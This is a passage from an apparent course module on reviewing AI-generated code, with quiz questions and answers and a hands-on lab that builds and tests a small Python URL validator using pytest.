That choice is reasonable when data-boundary, cost, latency, or offline constraints matter more than maximum reasoning quality and the task fits the local model’s strengths. Local generation can work well for small pure functions, repetitive patterns, summaries, and autocomplete. The team should still use the same diff review and tests because local execution does not guarantee correctness.

Question 4: A generated API client handles successful responses but crashes on intermittent network failures in production. What should have been included in the generation and review workflow?

The task contract should have required timeout handling, retry policy, HTTP error handling, and tests for failure responses. The missing element was a deterministic generate-review-test loop that turned the model’s draft into source-controlled evidence. Review should have checked that the client never assumes a perfect network and that the tests simulate timeouts or server errors without calling a live service.

Question 5: A terminal agent claims it fixed a bug, but the diff shows a removed assertion in the failing test. How should you respond?

Reject the patch or isolate the legitimate implementation changes from the weakened test. A generated fix is not acceptable if it makes evidence less meaningful. The next prompt should restate that existing assertions must be preserved unless the behavior contract is explicitly changed, and the reviewer should run the original failing case again after the implementation is corrected.

Question 6: A model suggests installing a package whose name resembles a popular dependency but does not appear in official framework documentation. What review steps are appropriate?

Treat the suggestion as untrusted. Verify the package identity in the official registry, inspect the linked repository, check maintainer and release history, review the license, scan for known security concerns, and ask whether an existing approved dependency or standard-library feature already solves the task. If the dependency cannot be justified, do not install it.

Hands-On Exercise: Generate, Review, and Verify a URL Utility

This exercise uses deterministic files so you can practice the review loop without depending on a live model response. You will start with a plausible generated implementation, review it as untrusted code against review-driven tests that are already provided, gather evidence by running the suite, and then improve the generation prompt so a future draft would capture the missing constraints. The point is not that URL validation is glamorous. The point is that a small parser has enough edge cases to show why generated code must be reviewed.

Task 1: Create the Lab Workspace

Run the setup from a scratch directory outside any production repository. The commands create a tiny package, install pytest, and keep the generated artifact small enough to review line by line. If your system uses a different Python launcher, adapt the venv creation step, but keep the test and execution commands inside the virtual environment.

mkdir url_generation_review_lab
cd url_generation_review_lab
python3 -m venv .venv 2>/dev/null || python -m venv .venv
.venv/bin/python -m pip install --upgrade pip pytest
mkdir -p url_tools tests
touch url_tools/__init__.py

Task 2: Start With a Plausible Generated Draft

Imagine the prompt was: “Generate a small Python URL utility with validation, parsing, and normalization using only the standard library.” The output below is plausible and syntactically clean. It is also under-specified. Copy it into url_tools/validator.py, then review it before running the provided tests. Look for assumptions about schemes, hosts, ports, credentials, and whitespace.

from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import urlparse, urlunparse


class URLValidationError(ValueError):
    """Raised when a URL cannot be parsed safely."""


@dataclass(frozen=True)
class ParsedURL:
    scheme: str
    host: str
    port: int | None
    path: str
    query: str


class URLValidator:
    allowed_schemes = {"http", "https"}

    def is_valid(self, url: str) -> bool:
        try:
            self.parse(url)
        except (TypeError, URLValidationError):
            return False
        return True

    def parse(self, url: str) -> ParsedURL:
        if not isinstance(url, str):
            raise TypeError("url must be a string")
        cleaned = url.strip()
        parsed = urlparse(cleaned)
        if parsed.scheme.lower() not in self.allowed_schemes:
            raise URLValidationError("unsupported URL scheme")
        if not parsed.hostname:
            raise URLValidationError("URL must include a host")
        if parsed.username or parsed.password:
            raise URLValidationError("credentials are not allowed in URLs")
        try:
            port = parsed.port
        except ValueError as exc:
            raise URLValidationError("invalid port") from exc
        return ParsedURL(
            scheme=parsed.scheme.lower(),
            host=parsed.hostname.lower(),
            port=port,
            path=parsed.path or "/",
            query=parsed.query,
        )

    def normalize(self, url: str) -> str:
        parsed = self.parse(url)
        netloc = parsed.host
        if parsed.port is not None:
            netloc = f"{netloc}:{parsed.port}"
        return urlunparse((parsed.scheme, netloc, parsed.path, "", parsed.query, ""))

Task 3: Review-Driven Tests (Provided)

The tests below encode review decisions that the original broad prompt did not mention. They reject credentials in URLs, unsupported schemes, missing hosts, invalid ports, and non-string input. Copy them into tests/test_validator.py. Read each test before running it and ask whether it protects a behavior you would actually want in a service that consumes user-supplied URLs.

import pytest

from url_tools.validator import URLValidationError, URLValidator


@pytest.fixture
def validator() -> URLValidator:
    return URLValidator()


@pytest.mark.parametrize(
    ("raw_url", "expected"),
    [
        ("HTTPS://Example.COM", "https://example.com/"),
        ("https://example.com:8443/path?q=1", "https://example.com:8443/path?q=1"),
    ],
)
def test_normalize_valid_urls(validator: URLValidator, raw_url: str, expected: str) -> None:
    assert validator.normalize(raw_url) == expected


@pytest.mark.parametrize(
    "raw_url",
    [
        "ftp://example.com/file.txt",
        "https:///missing-host",
        "https://user:secret@example.com",
        "https://example.com:99999",
        "",
    ],
)
def test_rejects_unsafe_or_malformed_urls(validator: URLValidator, raw_url: str) -> None:
    assert not validator.is_valid(raw_url)
    with pytest.raises(URLValidationError):
        validator.parse(raw_url)


def test_non_string_input_is_type_error(validator: URLValidator) -> None:
    with pytest.raises(TypeError):
        validator.parse(None)  # type: ignore[arg-type]

Task 4: Run the Evidence

Execute the test suite and treat failures as review feedback. If you edited the implementation, rerun the tests after each small change. The evidence matters because a generated explanation of why the code is safe is not the same as executable checks that exercise the safety boundaries.

.venv/bin/python -m pytest tests -q

Success criteria:

The test suite passes without weakening assertions.
The implementation uses only the standard library.
Unsupported schemes, credentials, missing hosts, invalid ports, and non-string input are tested.
You can explain one assumption the original prompt failed to state.
You inspected the implementation before trusting the tests.

Task 5: Improve the Prompt

After the tests pass, write a better generation prompt for the same utility. The improved prompt should mention allowed schemes, credential rejection, invalid port behavior, path normalization, type errors, dependency limits, and test categories. This final step matters because prompt improvement is part of the loop. You are not only fixing one generated output; you are learning how to prevent the same class of weak draft next time.

Learner check

The durable skill is not “getting code from a model.” The durable skill is turning an uncertain draft into a reviewed, tested, source-controlled patch.

Use that sentence as the review standard for the exercise. If the code is generated but not reviewed, tested, and controlled through ordinary repository workflow, the generation step is unfinished. A useful assistant speeds up the path to evidence; it does not replace the evidence.

Next Module

Next, continue to Module 1.8: AI-Assisted Debugging & Optimization. You now have a generate-review-test loop; the next module applies the same discipline to diagnosis, profiling, and optimization work.

Sources

Module 1.1: AI Coding Tools Landscape — Local Rosetta-stone context for AI coding tool families and authority boundaries.
OWASP Top 10 2025: A05 Injection — Standard application-security reference for injection risks that generated code can introduce.
OWASP Top 10 for LLM Applications 2025 — Reference for prompt injection, improper output handling, excessive agency, and AI supply-chain risks.
NIST SP 800-218 Secure Software Development Framework — Source for secure-development practices that still apply when code is AI-assisted.
SLSA Provenance — Background on provenance as a software supply-chain concept.
OpenSSF Scorecard — Reference for dependency and project-health review signals.
GitHub Copilot: Supported AI models (redirects to the supported-models page) — Dated snapshot source for model availability volatility in a coding harness.
GitHub Copilot: Understanding requests — Dated snapshot source for request and billing terminology.
OpenAI: Introducing Codex — Dated snapshot source for Codex positioning as a software-engineering agent.
OpenAI: Unrolling the Codex agent loop — Source on Codex CLI, local agent loops, and terminology around Codex offerings.
Anthropic Claude Code getting started — Dated snapshot source for a terminal coding-agent harness example.
Cursor modes documentation — Dated snapshot source for editor-agent modes and differing tool authority.
Gemini Code Assist overview — Dated snapshot source for Google coding-assistant capabilities.
Amazon Q Developer tiers — Dated snapshot source for AWS coding-assistant tiers and interface availability.
Tabnine deployment options — Dated snapshot source for private and on-premises assistant deployment options.